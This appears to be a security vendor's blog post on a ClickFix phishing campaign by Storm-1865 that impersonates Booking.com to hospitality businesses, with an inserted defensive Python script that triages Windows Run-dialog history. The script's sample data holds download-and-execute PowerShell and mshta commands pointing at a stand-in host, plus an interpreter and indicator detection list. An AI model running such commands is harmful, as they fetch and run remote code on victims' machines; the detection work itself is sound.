Overview:
A sophisticated phishing operation has emerged as a significant concern for the hospitality sector. The campaign leverages innovative social engineering techniques to compromise business systems and data.
Strategic Targeting:
Cyber security researchers have found that the campaign specifically targets hospitality organizations with established Booking.com business relationships across multiple regions, including North America, Oceania, Europe and various Asian markets.
Forensic analysis of the malware has revealed that its primary objectives are to harvest credentials and to compromise financial accounts.
Technical Innovation:
One thing that makes this campaign unique is its deployment of a technique that security researchers have dubbed “ClickFix” – a methodological advancement in malware delivery that circumvents traditional cyber security controls.
When this technique is applied, victims receive counterfeit system notifications or error messages that seem legitimate. Said messages encourage users to take actions that execute concealed malicious code.
According to analysts, this approach is particularly effective because:
- The notifications look authentic and contain plausible information
- The attack uses native operating system functionality to execute malicious code
- The attack’s configuration means that it likely will not trigger conventional malware detection mechanisms
Attack Sequence and Methodology:
The attack starts with contextually relevant communications that impersonate Booking.com, weaponizing industry-specific topics that are likely to prompt immediate action.
These include notifications regarding customer reviews, account security verification requirements, and demands from potential guests.
After engaging with embedded content, recipients are directed to sophisticated phishing environments featuring fake CAPTCHA exercises. The page then instructs victims to execute commands via the Windows Run dialog, at which point the malware is deployed.
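As an added defender-side illustration (not part of the original post and not Check Point's code): the Windows Run dialog records its command history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a triage script over exported entries can surface commands a user was talked into pasting during a fake CAPTCHA check. The entries below are constructed samples, and the interpreter list and indicator patterns are my assumptions about what such commands typically look like, not attributes of this campaign.

```python
import re
from typing import Dict, List

# Constructed sample of RunMRU values as exported from the registry.
# Windows appends a literal "\1" to every entry stored in this key.
SAMPLE_RUNMRU = [
    r"notepad\1",
    r"powershell -w hidden -c iwr http://example.invalid/x.ps1 | iex\1",
    r"mshta http://example.invalid/captcha.hta\1",
    r"\\fileserver\share\1",
]

# Assumed list of binaries that rarely belong in a normal user's Run history.
INTERPRETERS = ("powershell", "pwsh", "mshta", "cmd", "wscript", "cscript",
                "curl", "bitsadmin", "certutil", "rundll32", "regsvr32")

# Assumed indicator patterns; each yields a human-readable reason when it hits.
INDICATORS = [
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "inline code execution"),
    (re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
]


def triage_run_history(entries: List[str]) -> List[Dict[str, object]]:
    """Return the Run-dialog entries that look like pasted ClickFix-style commands."""
    findings = []
    for raw in entries:
        cmd = raw[:-2] if raw.endswith(r"\1") else raw  # strip the "\1" suffix
        tokens = cmd.strip().split()
        first = tokens[0].lower().rsplit("\\", 1)[-1] if tokens else ""
        if first.endswith(".exe"):
            first = first[:-4]
        reasons = []
        if first in INTERPRETERS:
            reasons.append(f"script interpreter: {first}")
        for pattern, label in INDICATORS:
            if pattern.search(cmd):
                reasons.append(label)
        if reasons:
            findings.append({"command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in triage_run_history(SAMPLE_RUNMRU):
        print(hit["command"], "->", ", ".join(hit["reasons"]))
```

Run it against the RunMRU values of the affected user profile; benign entries such as `notepad` or a UNC share are left alone, and each flagged command carries the reasons so an analyst can confirm quickly.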
Organizational Risk Implications:
The threat actors’ strategic focus on Booking.com business partners suggests that they are taking a calculated approach and want to exploit organizations with high-value data, resources, and simple financial transaction capabilities.
This is a campaign that could affect hospitality organizations financially, operationally or legally. The ensuing reputational damage could also impact stakeholder confidence.
About Storm-1865:
Over the past few years, the threat actors behind this campaign, known as Storm-1865, have demonstrated increasingly sophisticated techniques. Their adoption of ClickFix suggests a significant tactical evolution, and the group's volume of activity has also increased.
Enterprise Protection Strategy: Check Point Harmony Email & Collaboration
Check Point Harmony Email & Collaboration delivers comprehensive protection through:
- AI-powered threat detection systems capable of identifying sophisticated social engineering attempts
- Zero-day threat prevention technology that recognizes novel attack patterns
- Multi-layer email inspection capabilities examining message content, structure and behavioral patterns
- Cross-platform security integration that offers comprehensive collaboration tool protection
- Employee-centric security awareness programs that can enhance organizational resilience
Implementing robust email and collaboration security helps to protect everything that you’ve worked hard to build. To learn more about how Harmony Email & Collaboration can keep your systems secure, schedule a demo or reach out to your local Check Point representative.